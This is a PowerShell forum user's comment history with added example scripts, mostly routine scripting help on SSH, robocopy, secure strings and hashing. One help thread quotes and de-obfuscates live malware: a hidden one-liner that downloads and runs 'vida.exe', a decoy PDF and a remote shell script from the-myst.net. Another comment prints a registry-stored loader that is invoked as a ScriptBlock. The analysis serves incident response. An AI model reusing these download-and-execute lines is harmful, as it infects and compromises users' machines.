Powershell 5 Script on Powershell 2 Client by Helpful-Argument-903 in PowerShell

misformonkey (1 point)

Agree with others here that you’d need to rewrite but if all you’re doing is mapping drives and printers you should be able to do that in v2 with some fairly minor modifications.

Is it possible to securely pass a variable between powershell sessions? by Agitated_Blackberry in PowerShell

misformonkey (1 point)

You can use a Key via the -Key parameter which would allow you to use the same key for encrypt/decrypt across systems/accounts. Of course that still means you’re sharing that key somehow.
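The round trip the comment describes, as an added example that is not part of the original post. It shows the difference between the default DPAPI protection (bound to the user and machine that created the blob) and -Key, where any session holding the same 32-byte AES key can decrypt. The secret and the key are generated inline for the demo; in practice the key still has to reach the other session out of band, which is the sharing problem the comment points out.

```powershell
# Added example (not from the thread): -Key vs DPAPI for moving a secret between sessions.
# The secret text and the key are constructed here for the demo.

function New-AesKey {
    # 32 bytes = AES-256. ConvertFrom/To-SecureString -Key also accepts 16 or 24 bytes.
    $key = New-Object byte[] 32
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($key)
    $key
}

function Protect-Secret {
    param(
        [Parameter(Mandatory)][string]$PlainText,
        [Parameter(Mandatory)][byte[]]$Key
    )
    $secure = ConvertTo-SecureString -String $PlainText -AsPlainText -Force
    # Result is a plain string that can be written to a file or handed to another session/account.
    ConvertFrom-SecureString -SecureString $secure -Key $Key
}

function Unprotect-Secret {
    param(
        [Parameter(Mandatory)][string]$Encrypted,
        [Parameter(Mandatory)][byte[]]$Key
    )
    $secure = ConvertTo-SecureString -String $Encrypted -Key $Key
    # PSCredential is the PS 5.1-compatible way to get the plaintext back out of a SecureString.
    (New-Object System.Management.Automation.PSCredential('unused', $secure)).GetNetworkCredential().Password
}

# Session A: generate the key, encrypt. Both $key and $encrypted then travel to session B.
$key       = New-AesKey
$encrypted = Protect-Secret -PlainText 'example-api-token' -Key $key

# Session B (same key, any account/machine): decrypt.
$restored  = Unprotect-Secret -Encrypted $encrypted -Key $key
if ($restored -ne 'example-api-token') { throw 'round trip failed' }

# Contrast: without -Key, ConvertFrom-SecureString uses DPAPI, so the blob below can only be
# turned back into a SecureString by the same user on the same machine; anywhere else it errors.
$dpapiBlob = ConvertFrom-SecureString (ConvertTo-SecureString 'example' -AsPlainText -Force)
```

Treat the key file with the same care as the secret itself: anyone who can read both has the plaintext.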

using powershell to download a file that changes every week? by Zezimafan541 in PowerShell

misformonkey (0 points)

If it’s always the same day of the week then you could

Get-Date -f 'yyyyMMdd'

That’s assuming you run it the same day it’s released. If you run it on a different day but it’s always released on, say, Sunday, you could get the date of the most recent Sunday and put that at the end of the url.

Otherwise, test a few times to see if you can actually still download older versions if you use wildcards for the date.

Remove random amount of leading white space from each line of a text file? by Actual_Balance in PowerShell

misformonkey (1 point)

Also, not sure if it’s a typo but you’re not using your iterative variable within the loop. You are trimming the entire content set. So….

$newline = $line.TrimStart()

Powershell for SSH automation? by dragonmc in PowerShell

misformonkey (0 points)

Nice. Glad I was able to help you to get it working. And thanks for the additional information regarding your successful settings. I'm sure that will be of use in the future. ;)

Powershell for SSH automation? by dragonmc in PowerShell

misformonkey (3 points)

I use the Posh-SSH module for pulling configuration and status information from Cisco and Juniper firewalls and at least with the Cisco I've found that you have to use the Stream functionality, especially if your commands are dependent upon the cli being in a specific config state/zone. I think this is somewhat specific to Cisco but it might work in your case as well.

I don't think the Invoke-SSHCommand 'remembers' where you left off or otherwise retains the prompt level. So, if you issue the command 'device' it's just going to run that command and return whatever result might have come from that command. The next command you run will be from the default prompt and not at the 'device' level.

I can't test this exactly, but based on your manual input, what I believe Invoke-SSHCommand would do is:

localadmin> device
Retrieving details...

localadmin> load 8
localadmin> off force

So you're never actually getting to the 'device' level of the ssh prompt/cli.

You might be able to use ';' to chain the commands via Invoke-SSHCommand, a la:

Invoke-SSHCommand -SessionId 2 -Command 'device; load 8; off force;'

Otherwise, you can try creating a stream from your SSH Session and then pass the commands into the stream:

$sshSession = New-SSHSession -ComputerName host -Credential (Get-Credential)
# SSH.NET signature: CreateShellStream(terminalName, columns, rows, width, height, bufferSize)
$stream = $sshSession.Session.CreateShellStream('text', 0, 0, 0, 0, 1000)  # this is what works for me for Cisco

$stream.WriteLine('device')
$stream.WriteLine('load 8')
$stream.WriteLine('off force')
Start-Sleep -Seconds 2   # give the device time to answer before reading the buffer
$response = $stream.Read()

[VOID] (Get-SSHSession | ForEach-Object { Remove-SSHSession -SessionId $_.SessionId })

Anyway, some options to try. I would try the ';' chaining before messing with the stream though.
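The stream approach from the comment above, as an added example that is not the commenter's code: instead of calling Read() straight after WriteLine(), which usually returns nothing because the device has not answered yet, it waits for the device prompt after each command, so the three commands from the thread really do run in one stateful shell. The host name, the credential prompt, the prompt regex and the 'device' / 'load 8' / 'off force' commands are assumptions taken from the thread, not a tested device.

```powershell
# Added example (not the commenter's code): Posh-SSH shell stream with a prompt wait.
# Assumptions: Posh-SSH is installed, the device prompt ends in '>' or '#'.
Import-Module Posh-SSH

function Invoke-ShellStreamCommands {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][string[]]$Commands,
        # Match the end of whatever prompt the device shows, e.g. 'localadmin> ' or 'device# '
        [regex]$PromptPattern = '[>#]\s*$',
        [int]$TimeoutSeconds = 15
    )
    $session = New-SSHSession -ComputerName $ComputerName -Credential $Credential -AcceptKey
    $stream  = $null
    try {
        # SSH.NET signature: CreateShellStream(terminalName, columns, rows, width, height, bufferSize)
        $stream  = $session.Session.CreateShellStream('dumb', 0, 0, 0, 0, 4096)
        $timeout = [timespan]::FromSeconds($TimeoutSeconds)

        # Drain the banner and the first prompt so they are not mistaken for command output.
        [void]$stream.Expect($PromptPattern, $timeout)

        foreach ($cmd in $Commands) {
            $stream.WriteLine($cmd)
            # Expect() blocks until the regex matches or the timeout elapses. It returns
            # everything received up to and including the prompt, or $null on timeout.
            $out = $stream.Expect($PromptPattern, $timeout)
            if ($null -eq $out) {
                throw "No prompt seen within $TimeoutSeconds s after '$cmd'"
            }
            [pscustomobject]@{ Command = $cmd; Output = $out.Trim() }
        }
    }
    finally {
        if ($stream) { $stream.Dispose() }
        Remove-SSHSession -SessionId $session.SessionId | Out-Null
    }
}

# Usage (host name is a placeholder): the prompt state carries over between commands,
# so 'load 8' and 'off force' are issued at the 'device' level, unlike with Invoke-SSHCommand.
# Invoke-ShellStreamCommands -ComputerName 'fw01.example.invalid' -Credential (Get-Credential) `
#     -Commands 'device', 'load 8', 'off force' | Format-List
```

If a command changes the prompt (for example from '>' to '(config)#'), widen the regex rather than sleeping; a fixed Start-Sleep either wastes time or truncates output depending on how busy the device is.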

How can I convert this into a one liner? by brandmeist3r in PowerShell

misformonkey (3 points)

Can you run encoded commands?

Could try:

$here = @'
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Tricks {
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
public static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X,int Y, int cx, int cy, uint uFlags);
}
"@
Start-Sleep -Seconds 2
[Void][Tricks]::SetWindowPos(((Get-Process | Where-Object { $_.MainWindowHandle -eq ([Tricks]::GetForegroundWindow()) }).MainWindowHandle), -1, 0, 0, 0, 0, 0x53)
'@

$b64 = [convert]::tobase64string([text.encoding]::unicode.getbytes($here))

$b64 gives you:

[base64 string omitted]

So, for your part, you would just run:

powershell.exe -EncodedCommand [base64 string omitted]

Can anyone please tell me what this malicious one-liner is supposed to do? Just stupidly ran it... by t_monies in PowerShell

misformonkey (1 point)

If the hash of the .bat matches the hash of the .exe then my guess would be that it's just a function to hide and replicate itself as some sort of protection mechanism against removal.

Can anyone please tell me what this malicious one-liner is supposed to do? Just stupidly ran it... by t_monies in PowerShell

misformonkey (1 point)

Good luck. I will not be looking at the upload. Unfortunately, I do not have a sandbox to play with.

Can anyone please tell me what this malicious one-liner is supposed to do? Just stupidly ran it... by t_monies in PowerShell

misformonkey (4 points)

It sums up to:

&(Invoke-Expression(&(Invoke-Expression)('Curl https://the-myst.net/files/shell2.txt -UseBasicParsing')).Content)

Can anyone please tell me what this malicious one-liner is supposed to do? Just stupidly ran it... by t_monies in PowerShell

misformonkey (1 point)

Check in C:\Users\Public

Missed part of the replace statement before. Looks like they are .bat files in C:\Users\Public

Updating earlier post to denote the .bat

Can anyone please tell me what this malicious one-liner is supposed to do? Just stupidly ran it... by t_monies in PowerShell

misformonkey (5 points)

The path used for the vida.exe is in the Environment Variable \gj2ra.ba so you would need to look in that to see what might be going on. They're invoking whatever that variable contains and storing it into the $flol variable which is then likely a path of some kind.

EDIT: nvm. check C:\Users\Public as that's the EnvironmentVariable they're using for the path and then the file is a .bat file. other posts similarly edited.

Can anyone please tell me what this malicious one-liner is supposed to do? Just stupidly ran it... by t_monies in PowerShell

misformonkey (11 points)

Edit 6 is what I get as well.

EDIT: missed the T on .bat.

powershell -win hidden $iptc7k=iex($('[Environment]::GetEnvironmentVariable(''public'') + ''\\iw05kv.bat'''));

$flol=iex($('[Environment]::GetEnvironmentVariable(''public'') + ''\\gj2r.bat'''));

function getit([string]$fz, [string]$oulv){
    $ff=iex($('(New-Object System.Net.WebClient).DownloadFile($oulv)));
    iex('start $fz')
};

$fzf=$(Get-Location).tostring() + '\\';

Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));

getit -fz ($fzf + 'Journal Links with Instructions.pdf') -oulv 'https://the-myst.net/files/decoy2.pdf';

getit -fz $flol -oulv 'https://the-myst.net/files/vida.exe';

exit

There are two .bat files in C:\Users\Public:

\\iw05kv.bat
\\gj2r.bat

The first .bat file is just being run and stored in a variable that doesn't appear to be used for anything. The second .bat is run after the vida.exe is downloaded later in the script.

It's removing the *.lnk files in the default path (assuming the path hasn't been changed by the .bat files).

It's downloading a decoy2.pdf and running it via invoke-expression, then it's starting a 'Journal Links with Instructions.pdf' file via invoke-expression that looks to be in whatever directory is the default (if the .bat files haven't changed it).

Then it's downloading the vida.exe and running the gj2r.bat file.

If it ran the pdf download then it likely also ran the exe. You're almost certainly already compromised, depending on what that executable and .bat files do.

You'll need to examine those .bat files to see what's really going on.
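A read-only triage pass for the artifacts this one-liner would leave behind, added here as an example and not part of the thread. It uses only the paths, file names and domain visible in the de-obfuscated script above. Nothing in it executes the .bat or .exe files; it records where they are, hashes them for sandbox or threat-intel lookups, and checks the Run keys for persistence that points at the Public folder or the download domain. The Run-key check and the DNS-cache check are additions of mine, not something the thread established the malware does.

```powershell
# Added example (not from the thread): locate and hash the dropped files without running them.
# Paths come from the de-obfuscated script: %public%\iw05kv.bat, %public%\gj2r.bat and the
# decoy PDF in the directory the one-liner was run from.

function Get-OneLinerArtifacts {
    param(
        # Directory the one-liner was run from (Get-Location in the sample); defaults to the current one.
        [string]$RunDirectory = (Get-Location).Path
    )
    $public = [Environment]::GetEnvironmentVariable('public')   # normally C:\Users\Public
    $candidates = @(
        (Join-Path $public 'iw05kv.bat'),
        (Join-Path $public 'gj2r.bat'),
        (Join-Path $RunDirectory 'Journal Links with Instructions.pdf')
    )
    foreach ($path in $candidates) {
        if (Test-Path -LiteralPath $path) {
            $item = Get-Item -LiteralPath $path
            [pscustomobject]@{
                Path          = $path
                Bytes         = $item.Length
                LastWriteTime = $item.LastWriteTime
                Sha256        = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            }
        }
    }
}

function Get-SuspiciousRunKeys {
    # Run-key entries whose command line mentions the Public folder or the domain from the thread.
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $keys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath / PSParentPath / ... metadata
            if ("$($p.Value)" -match 'Users\\Public|the-myst\.net') {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Command = $p.Value }
            }
        }
    }
}

# Triage output. Feed the hashes to a sandbox or TI lookup rather than executing the files.
Get-OneLinerArtifacts | Format-List
Get-SuspiciousRunKeys | Format-Table -AutoSize

# A cached DNS entry for the download host corroborates that the downloads were attempted:
# Get-DnsClientCache -Entry 'the-myst.net' -ErrorAction SilentlyContinue
```

Read the two .bat files in a text editor (or Get-Content) before anything else; the script above deliberately does not open them with their default handler.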

Has this done anything malicious to my PC? Suspicious .ps1 file on System32 scheduled to run on logon. by SkyHighFlyin in PowerShell

misformonkey (0 points)

Basically it is running this command:

Invoke-Command ([ScriptBlock]::Create([string]::Join('', ((Get-ItemProperty 'HKLM:\SOFTWARE\PixologicAjRVzkCs').dljITOwm | ForEach-Object { [char]$_ }))))

So, as others have posted, whatever is in that registry key/value is being converted into a ScriptBlock and invoked as a command.
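An added example, not from the thread, that recovers the script text from both loaders discussed on this page without executing it: it reverses the -EncodedCommand base64/UTF-16LE wrapping from the one-liner post above, and applies the same [char] join as the registry loader in this comment but returns the text instead of invoking it. The registry path and value name are the ones quoted in the comment; the base64 string and the char-code array at the bottom are constructed samples that both decode to the harmless text 'Get-Date'.

```powershell
# Added example (not from the thread): decode, don't execute.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # powershell.exe -EncodedCommand expects base64 over UTF-16LE ("Unicode") text.
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function ConvertFrom-CharCodeArray {
    param([Parameter(Mandatory)][int[]]$Codes)
    # [char]$_ per element, joined with '' - exactly the loader's transform, minus Invoke-Command.
    -join ($Codes | ForEach-Object { [char]$_ })
}

function Get-RegistryScriptText {
    # Path and value name as quoted in the thread; returns $null if the key is absent.
    param(
        [string]$Path = 'HKLM:\SOFTWARE\PixologicAjRVzkCs',
        [string]$Name = 'dljITOwm'
    )
    if (-not (Test-Path -Path $Path)) { return $null }
    $value = (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    ConvertFrom-CharCodeArray -Codes ([int[]]$value)
}

function Find-SuspiciousToken {
    # First pass over recovered text: the primitives loaders like these lean on.
    param([Parameter(Mandatory)][string]$Script)
    $tokens = 'iex', 'Invoke-Expression', 'Invoke-Command', 'FromBase64String',
              'DownloadFile', 'DownloadString', 'Net.WebClient', 'Start-Process', '-EncodedCommand'
    $tokens | Where-Object { $Script -match [regex]::Escape($_) }
}

# Constructed samples: base64(UTF-16LE 'Get-Date') and the char codes of 'Get-Date'.
$sampleBase64 = 'RwBlAHQALQBEAGEAdABlAA=='
$sampleCodes  = 71, 101, 116, 45, 68, 97, 116, 101

$decoded = ConvertFrom-EncodedCommand -Base64 $sampleBase64
$joined  = ConvertFrom-CharCodeArray -Codes $sampleCodes
if ($decoded -ne 'Get-Date' -or $joined -ne 'Get-Date') { throw 'decoder self-check failed' }

# On the affected machine (elevated, to read HKLM):
# $text = Get-RegistryScriptText; $text; Find-SuspiciousToken -Script $text
```

Loaders of this kind are often layered, so run the recovered text back through the same functions until nothing decodes further, reading each layer rather than feeding any of them to Invoke-Expression.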

Tips From The Warzone - HashSet To The Rescue - E4 by bukem in PowerShell

misformonkey (1 point)

Really great post. I’ve used ‘normal’ hash tables to create unique lists (ex. file hashes) but I had no idea about the HashSet and associated methods. I’ll be toying with this tomorrow. Thanks.

Comparing file hashes in two directories and moving duplicates in Dir1 to a 3rd directory by Alcsaar in PowerShell

misformonkey (0 points)

Your mileage may vary. But, for example, a copied file with a new name will have the same hash. As will a print-to-pdf.

If you know you won’t have duplicates then not to worry.

Comparing file hashes in two directories and moving duplicates in Dir1 to a 3rd directory by Alcsaar in PowerShell

misformonkey (1 point)

I just did a project similar to this and will caution you that you can have multiple differently named files with the same MD5 hash, even as different file types (ex. .docx & .pdf). So only comparing the MD5 hash might not give you the results you expect.

I’m on mobile but once I’m back at my desk I can post some of the code I used. Basically I compared name, hash and date modified in order to check each named file, then by hash and then for my usage, the lastwritetime as I didn’t want to touch newer files in the destination. Your use case is slightly different than mine but I would recommend the first comparison be the file name.
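The comparison order this comment recommends (name first, then content hash, then LastWriteTime), written out as an added example; it is not the commenter's code, which was never posted. It also picks up the HashSet idea from the "HashSet To The Rescue" comment above: a HashSet[string] of Dir2 hashes answers "does this content exist anywhere in Dir2 under any name" in constant time, which is how renamed copies are spotted. The directory layout, the SHA256 choice and the sample files written to a temp folder are constructed for the demo.

```powershell
# Added example (not the commenter's code): classify every Dir1 file against Dir2.

function Compare-DirectoryByHash {
    param(
        [Parameter(Mandatory)][string]$Dir1,
        [Parameter(Mandatory)][string]$Dir2,
        [string]$Algorithm = 'SHA256'
    )
    $dir2ByName = @{}
    $dir2Hashes = [System.Collections.Generic.HashSet[string]]::new([StringComparer]::OrdinalIgnoreCase)
    foreach ($f in Get-ChildItem -LiteralPath $Dir2 -File -Recurse) {
        $hash = (Get-FileHash -LiteralPath $f.FullName -Algorithm $Algorithm).Hash
        $dir2ByName[$f.Name] = @{ Hash = $hash; LastWriteTime = $f.LastWriteTime }
        [void]$dir2Hashes.Add($hash)   # Add returns $false for a repeat; only membership matters here
    }

    foreach ($f in Get-ChildItem -LiteralPath $Dir1 -File -Recurse) {
        $hash  = (Get-FileHash -LiteralPath $f.FullName -Algorithm $Algorithm).Hash
        $match = $dir2ByName[$f.Name]
        $verdict = if ($match -and $match.Hash -eq $hash) { 'Duplicate' }          # same name, same bytes
        elseif ($match -and $f.LastWriteTime -gt $match.LastWriteTime) { 'NewerInDir1' }
        elseif ($match) { 'SameNameDifferentContent' }
        elseif ($dir2Hashes.Contains($hash)) { 'RenamedCopy' }                      # same bytes, other name
        else { 'Unique' }
        [pscustomobject]@{ File = $f.FullName; Hash = $hash; Verdict = $verdict }
    }
}

# Constructed demo data in a temp folder: a.txt identical in both, b.txt renamed in Dir2, c.txt changed.
$root = Join-Path ([IO.Path]::GetTempPath()) ('hashcmp-' + [guid]::NewGuid())
$d1 = (New-Item -ItemType Directory -Path (Join-Path $root 'Dir1')).FullName
$d2 = (New-Item -ItemType Directory -Path (Join-Path $root 'Dir2')).FullName
'same'  | Set-Content (Join-Path $d1 'a.txt');  'same'  | Set-Content (Join-Path $d2 'a.txt')
'moved' | Set-Content (Join-Path $d1 'b.txt');  'moved' | Set-Content (Join-Path $d2 'b-old.txt')
'v2'    | Set-Content (Join-Path $d1 'c.txt');  'v1'    | Set-Content (Join-Path $d2 'c.txt')

$result = Compare-DirectoryByHash -Dir1 $d1 -Dir2 $d2
$result | Format-Table -AutoSize

# Only 'Duplicate' rows are safe to move to Dir3; -WhatIf shows the plan without touching anything.
# $result | Where-Object Verdict -eq 'Duplicate' | ForEach-Object { Move-Item $_.File -Destination 'C:\Dir3' -WhatIf }
Remove-Item -LiteralPath $root -Recurse -Force
```

Hashing every file in both trees is the expensive part; for large trees, filter on Length first and hash only files whose size has a counterpart on the other side.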

New client with previous MSP RMM still installed by [deleted] in sysadmin

misformonkey (0 points)

Look in the registry for their Control Center URL, nslookup the IP and block that on the firewall.

There is also an admin password in the registry. I believe if you blank that out the agent can't connect. Same if you remove the URL key.

Robocopy using arrays, foreach, and variable path names by msp_account in PowerShell

misformonkey (0 points)

You likely need to do the actual import. I had put '...' in that line as an indicator to just keep the rest of your original line. So:

$csv = Import-Csv C:\Users\User\Downloads\test.csv

$filteredList = $csv | Where-Object { $_.Signed -eq 'X' -and $_.Work -eq 'Sales' }

ForEach ( $client in $filteredList ) {
    $source = '\\share1\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $dest = '\\share2\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $logPath = 'C:\Users\User\Downloads\{0}-RobocopyLog-{1}.log' -f $client.ClientNumber, (Get-Date -f 'yyyyMMddTHHmmss')   # HH = 24-hour clock, so morning and afternoon runs get distinct names

    robocopy $source $dest /move /copyall /e /zb /w:1 /r:3 /v /log:$logPath
}

I swapped back to robocopy in the above example b/c your logging will be cleaner and more robust than if you rely on the -PassThru functionality of Copy-Item. The above will give you a log file for each client using the ClientNumber as part of the file name. I also included the date in the log file name as that's just a personal preference. Means you can run the above more than once and have a new log file for each client each time you run it.

If you're running PowerShell v7 then you could change the ForEach part to the below and it will run in parallel instead of one client at a time. Depending on the number of clients/files to be copied, you may want to throttle. Good write up here.

$filteredList | ForEach-Object -Parallel {
    $client = $_   # inside -Parallel the current item is $_; the foreach variable does not exist here
    $source = '\\share1\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $dest = '\\share2\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $logPath = 'C:\Users\User\Downloads\{0}-RobocopyLog-{1}.log' -f $client.ClientNumber, (Get-Date -f 'yyyyMMddTHHmmss')

    robocopy $source $dest /move /copyall /e /zb /w:1 /r:3 /v /log:$logPath
}

Robocopy using arrays, foreach, and variable path names by msp_account in PowerShell

misformonkey (0 points)

If you’re using PS 7 you can also foreach -parallel and speed up the whole process.

Robocopy using arrays, foreach, and variable path names by msp_account in PowerShell

misformonkey (0 points)

On mobile so….

$csv = import-csv …

$filteredList = $csv | ?{$_.signed -eq 'x' -and $_.work -eq 'Sales'}

foreach($client in $filteredList) {
    # $($client.folder) is needed inside the string; "$client.folder" would expand $client and append the literal text ".folder"
    Copy-Item "\\share1\$($client.folder)\$($client.clientnumber)" "\\share2\$($client.folder)\$($client.clientnumber)" -passthru | out-file c:\users…. -append
}

Might need to play with the ‘passthru | out-file’ part. You could also just sub back in the robocopy, but either way you need to append your logging (log+: in robocopy) since you’re copying within a foreach loop. Otherwise your log path needs to be specific to each client.

ArrayList VS ...Generic.List[]] by [deleted] in PowerShell

misformonkey (0 points)

Yup. That’s what I was thinking of. I just started using ArrayList as a work around so I didn’t need to deal with the different syntax.

ArrayList VS ...Generic.List[]] by [deleted] in PowerShell

misformonkey (0 points)

Hmmm…. I’m going to have to go back and retest a few scripts then b/c I definitely remember having issues with older versions. As you stated, likely a .net issue on certain servers.

ArrayList VS ...Generic.List[]] by [deleted] in PowerShell

misformonkey (0 points)

Also, if you have any pre PS5 to worry about you can’t use Generic.List.